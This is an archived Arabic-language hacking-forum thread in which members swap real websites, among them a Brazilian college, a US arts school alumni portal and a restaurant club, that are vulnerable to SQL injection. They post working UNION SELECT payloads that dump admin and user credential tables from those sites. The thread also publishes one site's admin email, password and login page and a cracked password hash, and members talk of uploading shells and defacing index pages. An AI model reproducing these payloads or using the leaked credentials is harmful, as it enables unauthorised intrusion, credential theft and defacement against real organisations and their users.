:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

VIURIS.SA 12-24-2010 02:24 AM

[align=center]السلام عليكم أخواني الكرام
هل من مواقع ؟؟
[/align]

aircrack -ng 12-24-2010 02:37 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 272988)
الحقنة

كود PHP:

http://www.faculdadevilavelha.com.br/novo/noticias2.php?id=-703+UNION+SELECT+1,group_concat(id,0x3a,username,0x3a,senha),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tbusuarios-- 


جميل اخي فيكتور
استعملت us بدل pas
كود:

http://www.faculdadevilavelha.com.br/novo/noticias2.php?id=-703 UNION SELECT 1,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/ ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+/*!where+column_name+LIKE+CHAR(37, 117, 115, 37)*/--

Victors 12-24-2010 02:48 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 273045)
جميل اخي فيكتور
استعملت us بدل pas
كود:

http://www.faculdadevilavelha.com.br/novo/noticias2.php?id=-703 UNION SELECT 1,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/ ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+/*!where+column_name+LIKE+CHAR(37, 117, 115, 37)*/--

بالفعل اخوي

لاني كنت شاكك باللغة لانها اسبانية

ومنتظرين مواقع لرفع شل :088:

aircrack -ng 12-24-2010 02:53 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 273050)
بالفعل اخوي

لاني كنت شاكك باللغة لانها اسبانية

ومنتظرين مواقع لرفع شل :088:

اوكي اخي
انا راح ابحث عن مواقع تعلق فيها اندكس
غدا انا في عطلة يعني راحة و حقنsmilies18 هههههههههههههههه

Victors 12-24-2010 03:01 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 273053)
اوكي اخي
انا راح ابحث عن مواقع تعلق فيها اندكس
غدا انا في عطلة يعني راحة و حقنsmilies18 هههههههههههههههه

خلال بحثي بالمواقع

حقنت موقع وطلعت الادمن والباسوورد وكمان لقيت مسار اللوحة ولما جيت ادخل

طلع لي

[caution]
Error in Selection Query
select id,username,role from admin where username = 'admin' and password = 'admin'
No database selected[/caution]

قهـر :grr:

aircrack -ng 12-24-2010 11:07 AM

معليش اخي فيكتور
انا كمان مرة جاتني مثل ماطلعلك بس كان مبرمج الموقع عامل اللوحة من برا يعني في مسار اللوحة دخلت اليوزر والباس بعدين جاني خطا اتجهت لصفحة الرئيسية للموقع لقيت نفسي اني اقدر اعدل على الموقع هي كلياتها حيل المبرمجين

انا جبتلكم موقع شات

http://www.imgovi.com/fr/detail.php?id=-68

Victors 12-24-2010 05:56 PM

الحقنة
كود PHP:

http://www.imgovi.com/fr/detail.php?id=-68+UNION+SELECT+1,2,3,group_concat(id_client,0x3a,login_client,0x3a,password_client),5,6,7,8,9,10,11,12+from+people-- 


Victors 12-24-2010 06:14 PM

موقع لم استطع استعراض جداول القاعدة

http://www.bia2.com/music-review/review.php?id=-1

aircrack -ng 12-25-2010 01:45 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 273409)
موقع لم استطع استعراض جداول القاعدة

http://www.bia2.com/music-review/review.php?id=-1

هلا اخي
بس هالمواقع اصدار القاعدة اربعة
وانا مابحبوش

كود:

http://www.bia2.com/music-review/review.php?id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15--

aircrack -ng 12-25-2010 09:03 PM

السلام عليكم
موقع لقيته على السريع

http://www.asidoregon.org/newsdetail.php?id=-218

agentsimo 12-25-2010 09:19 PM

السلام عليكم
403 Permission Denied
You do not have permission for this request /newsdetail.php?id=-218

agentsimo 12-25-2010 09:21 PM

الموقع غير شغال عندي

agentsimo 12-25-2010 09:26 PM

هدف جديد
http://www.fibercryst.com/product_details.php?id=389

Victors 12-25-2010 10:31 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 273740)
السلام عليكم
موقع لقيته على السريع

http://www.asidoregon.org/newsdetail.php?id=-218


الحقنة

كود PHP:

http://www.asidoregon.org/newsdetail.php?id=-218+UNION+SELECT+1,group_concat(id,0x3a,user,0x3a,password),3,4,5,6,7,8+from+tblUsers-- 


aircrack -ng 12-25-2010 10:45 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 273757)

مفيش عمود مصاب
واذا انت حقنتو نزلنا الحقنة لنشوف شو السالفة

Victors 12-25-2010 10:56 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 273804)
مفيش عمود مصاب
واذا انت حقنتو نزلنا الحقنة لنشوف شو السالفة

بالفعل اخوي لم اجد اي عمود مصاب

ولو قدر agentsimo يحقنة يا ريت يقول لنا الطريقة

aircrack -ng 12-25-2010 11:41 PM

اخي فيكتور هل من موقع جديد
انا كل شيء حجب عندي ههههههههههه حتى العم قوقل
يخرب بيته مزود الخدمة تبعي

Victors 12-26-2010 12:16 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 273830)
اخي فيكتور هل من موقع جديد
انا كل شيء حجب عندي ههههههههههه حتى العم قوقل
يخرب بيته مزود الخدمة تبعي


ابشر أخوي

اتفضل

http://www.lotodance.com/news.php?id=1

aircrack -ng 12-26-2010 12:30 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 273847)
ابشر أخوي

اتفضل

http://www.lotodance.com/news.php?id=1

تسلم عمي فيكتور
هي الحقنة

كود:

http://www.lotodance.com/news.php?id=-1 UNION SELECT 1,group_concat(login,0x3a,id_user,0x3a,password),3,4+from+users--

Victors 12-26-2010 12:56 AM

وهذا موقع قبل ما اروح انام :)

http://www.montserrat.edu/alumni/alu...p?profile_id=2

يالله تصبحوا على خير


اشوفكم بكره ان شاء الله

agentsimo 12-26-2010 11:03 AM

الحقنة الاخيرة
http://www.montserrat.edu/alumni/alu...?profile_id=-2 UNION SELECT 1,2,group_concat(user_name,0x3a,user_password,0x3a ,user_access),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18+from+tbl_user--

إسلام العالم 12-27-2010 12:59 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 273886)
وهذا موقع قبل ما اروح انام :)

http://www.montserrat.edu/alumni/alu...p?profile_id=2

يالله تصبحوا على خير


اشوفكم بكره ان شاء الله

الحقنة :
اقتباس:

http://www.montserrat.edu/alumni/alu...p?profile_id=2 and 1=0 UNION SELECT 1,2,group_concat(column_name,0x3e,table_schema,0x3 e,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18+from+information_schema.columns+where+column_na me +like+char(37, 112, 97, 115, 115, 37)--
اليوزر :
الباس :f130b8702797007b6a0f68b8c414d00c is
بعد فك التشفير : 1970@mca!

و لكن كالعادة لم أجد لوحة الأدمن....

agentsimo 12-27-2010 04:41 PM

السلام عليكم
اليوم جايب ليكم هدف لاصحاب البلايند
http://www.monsmartphone.net/smartphone.php?id=71
الحقيقة انا ما عرفت احقنه لانني لا اعرف ما هو table name الدي يوجد فيه اليوز و الباس و column name بتاع اليوز و الباس للموقع المهم اضن هده هي صعوبة البلايند يعني ان لم تكن تعرف السكريبت جيدا ما راح تقدر تحقنو متلا كان سكريبت جوملا كلنا نعرف table و column بتاعو لدلك نحقنو بسهولة لكن ان لم نعرفه راح نلقا صعوبة و اضن هده هي صعوبة البلايند البعض يقول في acssi لكن اضنها سهلة فهي سوى مسالة وقت لتكملها
ارجو النقاش في الموضوع و شكراا

agentsimo 12-27-2010 05:21 PM

هدف اخر للبلايند
http://immotime.fr/maison.php?id=781

Victors 12-28-2010 08:01 PM

السلام عليكم

أخوي البلايند يبي له وقت وجهد وأنا لما اشوف الموقع بلايند امر عليه مرور الكرام :a18:

الا لو كان سكربت معروف طبعاً

على العموم جايب لكم هدف سهل الحقن


http://beltranssat.by/news_details.php?news_id=1

Dr.Unkn0wn 12-28-2010 08:43 PM

[align=center]الحقنة[/align]
كود PHP:

http://beltranssat.by/news_details.php?news_id=-1 UNION SELECT 1,concat(login,0x3a,admin_user_id,0x3a,password),3,4 from admin_user-- 


Dr.Unkn0wn 12-28-2010 10:37 PM

السلام عليكم

Dr.Unkn0wn 12-28-2010 10:38 PM

اي هدف آخر؟

إسلام العالم 12-28-2010 11:48 PM

[align=center]السلام عليكم يا أحباب...

منتظرين أهداف للدعس[/align]

agentsimo 12-29-2010 04:34 PM

ههههههه يبدو ان كل الدي يوجد في الغرفة لا يعرف البلاين
هل تعرفون ان المواقع المهمة لاختراقها فانها تتطلب جهد اكترمن الحقن العادي متل مواقع الحكومية و مواقع الشوب المشهورة ...
لدلك نريد تعلم اكتر على البلايند

Victors 12-29-2010 09:49 PM

السلام عليكم

كيفكم شباب

اليوم جبت لكم موقع استمتعت بحقنة

جربوا احقنوه :)

http://www.curryclub.org/ShowRestaurant.php?RestID=2

إسلام العالم 12-29-2010 11:43 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 275660)
ههههههه يبدو ان كل الدي يوجد في الغرفة لا يعرف البلاين
هل تعرفون ان المواقع المهمة لاختراقها فانها تتطلب جهد اكترمن الحقن العادي متل مواقع الحكومية و مواقع الشوب المشهورة ...
لدلك نريد تعلم اكتر على البلايند

أخي أنا شوي منيح بالبلايند ...

و المواقع يلي وضعتها ليست مصابة بالبلايند أخي....

إسلام العالم 12-30-2010 12:34 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 275862)
السلام عليكم

كيفكم شباب

اليوم جبت لكم موقع استمتعت بحقنة

جربوا احقنوه :)

http://www.curryclub.org/ShowRestaurant.php?RestID=2

أخي لم يظهر مع العامود المصاب.....حاولت كثيرا

agentsimo 12-30-2010 02:46 AM

ههههههههههههه
يبدو انك ما بتعرف شيء عن البلايند سكيول
المرة القادمة لا تقل شيء و انت لا تعرف شيء عنه ادهب لمنتدى الدورات و راجع دورت البلايند
و المواقع هي مصابة بالبلايند 100%

agentsimo 12-30-2010 03:09 AM

تم الحقن و العمودالمصاب هو رقم 3
بالنسبة للاخ الدي لم يجد العمود المصاب اقول له ان العمود المصاب موجود في صورة محجوبة يعني غير شغالة تجي و تعمل لها propriete ستجد في رابطها رقم العمود المصابنحن طلع معنا رقم 3 يعني هو لي مصاب و طبعا النتيجة حتكون في الصورة المعطوبة يعني كل مرة في الحقن ستعمل propriete لصورة لتطلع لك المعلومات المهم هدى الحجب للاعمدة المصابة يعملونه المبرمجون لدوافع امنية يعني ما يتلع العمود المصاب و نحن الحمد لله تخطينا المشكل و ارجو ان اكون وضحت لك كيفي تطلع الاعمدة المصابة
المهم الحقنة
http://www.curryclub.org/ShowRestaurant.php?RestID=2 UNION SELECT 1,2,group_concat(ID,0x3a,Name,0x3a,Password,0x3a,E mail,0x3a,SuperUser),4,5+from+users--
صفحة الادمين
http://www.curryclub.org/login.php
معلومات الادمين
mark@extrabit.com
xyzzy
بانتضار رفع الاندكس :yes:

Victors 12-30-2010 10:47 AM

لعلمكم العمود المصاب ليس 3 فقط ولكن العمود 4 مصاب ايضاُ smilies3

إسلام العالم 12-30-2010 12:10 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 276035)
ههههههههههههه
يبدو انك ما بتعرف شيء عن البلايند سكيول
المرة القادمة لا تقل شيء و انت لا تعرف شيء عنه ادهب لمنتدى الدورات و راجع دورت البلايند
و المواقع هي مصابة بالبلايند 100%

أخي معليش أنا ما بعرف شي بالبلايند...
بس لو ممكن تتأكد من أول موقع وضعته...
الثاني مصاب و لكن لم أقدر أن أخمن الجدول....

Dr.Unkn0wn 12-30-2010 01:23 PM

السلام عليكم
اعطونا مواقع مصابة بسكيول انجكشين


الساعة الآن 11:58 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0